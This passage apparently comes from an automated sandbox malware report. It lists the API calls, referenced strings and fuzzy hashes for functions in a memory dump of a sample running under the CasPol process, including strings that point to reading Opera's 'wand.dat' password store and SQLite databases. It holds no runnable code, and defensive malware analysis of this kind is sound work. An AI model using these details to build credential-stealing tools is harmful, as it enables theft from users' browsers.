                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1889144086-0
                                                                                                                                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                    • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                                                    • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                    Memory Dump Source
